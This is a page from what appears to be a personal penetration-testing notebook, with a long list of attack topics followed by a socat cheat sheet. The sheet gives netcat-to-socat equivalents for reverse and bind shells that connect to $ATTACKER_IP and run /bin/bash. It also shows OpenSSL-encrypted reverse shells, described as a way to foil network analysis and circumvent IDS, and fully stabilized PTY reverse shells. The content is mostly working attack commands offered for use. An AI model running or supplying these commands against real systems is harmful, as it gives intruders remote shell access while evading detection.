Cardboard Iguana Security
spells
Abusing wildcard expansion in Bash
Access the Windows Registry using PowerShell
Add Windows users at the command line
Aircrack-NG
ARP scanning
ARP
AS-REP roasting with Impacket
AS-REP roasting With Rubeus
AS-REP roasting
Automate Netlify builds with IFTTT
Automatically stabilize a reverse shell with socat
Avoid dropping privileges with SUID Bash
awk
Backdoor Visual Basic Scripts
basenc
Bash reverse shell
Bash scripting
Bulk edit Windows permissions
Burp Suite
Bypass the PowerShell execution policy
Bypass Windows antivirus with C Sharp
Calculate a file hash on Windows with CertUtil
Call Mimikatz from a meterpreter shell
cat
cewl
Change a branch name in Git
Change an RSA key passphrase with OpenSSL
Cisco IOS
Common Windows user types
Compact VM disk images
Confirm the existence of a Gmail address
crackmapexec
Create a GPG key with SSH support
Create a zip bomb
CUPP
Day One to Obsidian conversion script
DCERPC
Debugging Bash scripts
Default CIFS shares
dig
dir
Disable AMSI
DRSUAPI
Easy reverse DNS lookups
enum4linux
Enumerate AD CS templates with CertUtil
Equivalent Windows and UNIX commands
Evil-WinRM
Exploit LD_LIBRARY_PATH
Exploit LD_PRELOAD
Exploit local Windows services
Exploit local Windows tasks
Exploit remote Windows services
Exploit remote Windows tasks
Exploit the Bash PS4 prompt
Exploit the Windows DLL search order
Exploit the Windows FoDHelper
Exploit the WinLogon initialization sequence
Exploit VBA scripts with msfvenom
Exploit weak etc-passwd permissions
Exploit weak etc-shadow permissions
Exploit Windows file associations
Exploit Windows HTML applications with msfvenom
Exploit Windows services
Exploit Windows shortcut files
Exploit Windows tasks
Export highlights and annotations from Kobo eReaders
Extract the webpage title from a URL
ffmpeg
Find and replace a single line in a large text file
Find executables with SUID capabilities
find
findstr
finger
Fix EXIF data on Google Photos exports
FTP
FTPS
fuff
gdb
Gemini compatible markdown
Get a shell from ViM
Get an SSL certificate
Get-FileHash
Get-WinEvent
Git on Windows
gobuster
Golden and silver ticket attacks
grep
Hashcat
HTML applications
HTTP
Hydra
icacls
ICMP
iftop
IIS configuration data
IMAP
Impacket
Invoke-Mimikatz
Invoke-WebRequest
iOS quirks
ipconfig
IPSec
IPv4
Java
John the Ripper
JSON Web Tokens
Kerberoasting with Impacket
Kerberoasting with Rubeus
Kerberoasting
Kerberos
Kerbrute
less
Load a shell with a simple executable
Local file inclusion attacks
Look up unicode symbols and emojis
MAC address
Magic numbers
man
Match files to packages in Debian-based operating systems
Match files to packages in Red Hat-based operating systems
Metasploit MS SQL modules
meterpreter
Mimikatz
MITRE ATTaCK emulation plans
more
MS SQL
msfconsole
msfvenom
MySQL
nano
nbtscan
net
netcat
netsh
netstat
NFS
Nikto
Nmap
Node.js
nslookup
NTLM hashes
Oracle SQL Server
OSI model
OWASP ZAP
Perl
PHP local file inclusion attacks
PHP
ping
Poison null byte attack
Poison null byte in PHP
Polkit
Pop a SYSTEM shell on the Windows login screen using sticky keys
Pop a SYSTEM shell on the Windows login screen using Utilman
POP3
Port scanning with Bash
POSIX process signals
Powercat
PowerShell reverse shell
PowerView
ps
Pull SSL certificates from an external server
Python
Quick-n-dirty Python web server
Quickly bypass ssh-agent
Quickly find the canonical path of a file
RCE via XXE in PHP
Read a file beginning with a dash
reg
RegEx metacharacters
Remotely install a Windows package with PowerShell
Remove duplicate lines in Bash
Retrieve AIX fileset information
Retrieve AIX system information
Rubeus
Ruby
Run a remote Windows command using PowerShell
Run commands directly with PowerShell
RunAs
Send a command using OpenSSL
Set the PATH in a session on UNIX-like operating systems
Set the PATH in a session on Windows
Set up WMI in PowerShell
Shell stabilization
SIP
smbclient
smbget
smbmap
SMTP
socat
SQL injection attacks
SQLMap
ss
SSH
sudo
systemctl
systeminfo
tar
TCP header flags
TCP headers
TCP window size
TCP
tcpdump
Telnet
The Harvester
tmux
Transfer files over FTP using netcat
UDP
unbuffer
Uniform resource locators
UNIX file descriptors
UNIX password hashes
UNIX permissions
Unquoted path handling in Windows
Upgrade PostgreSQL
Use a Raspberry Pi 4B as hacking accessory
Use an alternate SSH key with Git
Use Bash functions to backdoor executables
Use Burp Suite with Firefox
Use Burp Suite with mobile apps
Use curl and jq with web APIs
Use OpenSSL to encrypt and decrypt files
Use the Windows Firewall to relay ports
Use unsupported display resolutions with Samsung DeX
Use WinRM with PowerShell
Useful built-in commands for Linux reconnaissance
Useful built-in commands for Windows reconnaissance
Useful Linux reconnaissance scripts
Useful scripts for Windows reconnaissance
ViM
Visual Basic for Applications
wfuzz
whoami
Wi-Fi
Windows DLL search order
Windows event IDs
Windows event logs
Windows local service accounts
Windows logon scripts
Windows permissions
Windows reconnaissance with PowerShell
Windows Remote Management
Windows Run and RunOnce Registry keys
Windows Scripting Host
Windows SeBackup and SeRestore permissions
Windows SeImpersonate and SeAssignPrimaryToken permissions
Windows service ACLs
Windows services
Windows SeTakeOwnership permission
Windows Startup folder
Windows unattended installation data
winrs
Wireshark
wmic
Work with base64 encoding using PowerShell
Work with remote services using WMI and PowerShell
Work with remote tasks using WMI and PowerShell
Working with services in PowerShell
XFreeRDP
XSS attacks
Xterm
xxd
XXE attacks
youtube-dl
Cardboard Iguana Security
Cardboard Iguana Security

socat

socat: The anything-to-anything connector!

socat vs. netcat

socat ↔ netcat command equivalencies:

# Reverse shell (attacker)
#
nc -lnp $LISTENER_PORT
socat TCP-LISTEN:$LISTENER_PORT -

# Reverse shell (target)
#
nc $ATTACKER_IP $LISTENER_PORT -e /bin/bash
socat TCP:$ATTACKER_IP:$LISTENER_PORT EXEC:"/bin/bash -li"

# Bind shell (attacker)
#
nc $TARGET_IP $LISTENER_PORT
socat TCP:$TARGET_IP:$LISTENER_PORT

# Bind shell (target)
#
nc -lnp $LISTENER_PORT -e /bin/bash
socat TCP-LISTEN:$LISTENER_PORT EXEC:"/bin/bash -li"

socat gets us an interactive login shell right out the gate, though we're still vulnerable to Ctrl+C. Note that when binding to PowerShell, use powershell.exe,pipes in order to force PowerShell to use UNIX-style STDIN/STDOUT.

Encrypted shells

socat can make encrypted connections, which foil after-the-fact network analysis and may circumvent IDS entirely.

# Generate a self-signed certificate.
#
openssl req --newkey rsa:2048 -nodes \
            -keyout shell.key -x509 -days 362 \
            -out shell.crt

# Create a PEM file combining the certificate and key.
#
cat shell.key shell.crt > shell.pem

# Start a listener.
#
socat OPENSSL-LISTEN:$LISTENER_PORT,cert=shell.pem,verify=0 -

# Start the reverse shell on the target.
#
socat OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 EXEC:"/bin/bash -li"

The verify=0 directive turns off certificate validation, so this isn't a "secure" connection in the sense that it's been authenticated, but it is secure in the sense that it's encrypted.

Shell "stabilization"

Automatically stabilize a reverse shell with socat

Automatically stabilize a reverse shell with socat

Shell "stabilization" refers to the process of making a remote shell behave like a normal local shell - so, allowing interactive programs to work properly, ensuring that input is not echoed inappropriately, etc.

We can use socat to create an auto-stabilized reverse shell on UNIX-like systems.

# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo.
# Basically the `stty raw -echo`.
#
socat TCP-LISTEN:$LISTENER_PORT FILE:`tty`,raw,echo=0

# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
#     pty    - allocate a PTTY
#     stderr - redirect STDERR to the attacker
#     sigint - pass signals (Ctrl+C) through
#     setsid - use a new session
#     sane   - use a variety of tweaks to "normalize" the
#              terminal's environment
#
socat TCP:$ATTACKER_IP:$LISTENER_PORT \
      EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane

Same thing, but over an encrypted connection:

# Attacker: Connect $LISTENER_PORT to the current TTY,
# send raw keycodes, and turn off terminal echo. Basically
# the `stty raw -echo`.
#
socat \
	OPENSSL-LISTEN:$LISTENER_PORT,cert=$PEM_FILE,verify=0 \
	FILE:`tty`,raw,echo=0

# Target: Connect the listener on the attacker to an
# interactive login bash shell.
#
#     pty    - allocate a PTTY
#     stderr - redirect STDERR to the attacker
#     sigint - pass signals (Ctrl+C) through
#     setsid - use a new session
#     sane   - use a variety of tweaks to "normalize" the
#              terminal's environment
#
socat \
	OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 \
	EXEC:"/bin/bash -li",pty,stderr,sigint,setsid,sane
Tip

The reverse shell will not pick up on your terminal size, so you'll need to manually specify it using stty rows and stty cols.

Links to this page
Automatically stabilize a reverse shell with socat
Bash reverse shell
Perl
PHP
Python
Ruby
socat
Interactive graph
On this page
socat
socat vs. netcat
Encrypted shells
Shell "stabilization"
Powered by Obsidian Publish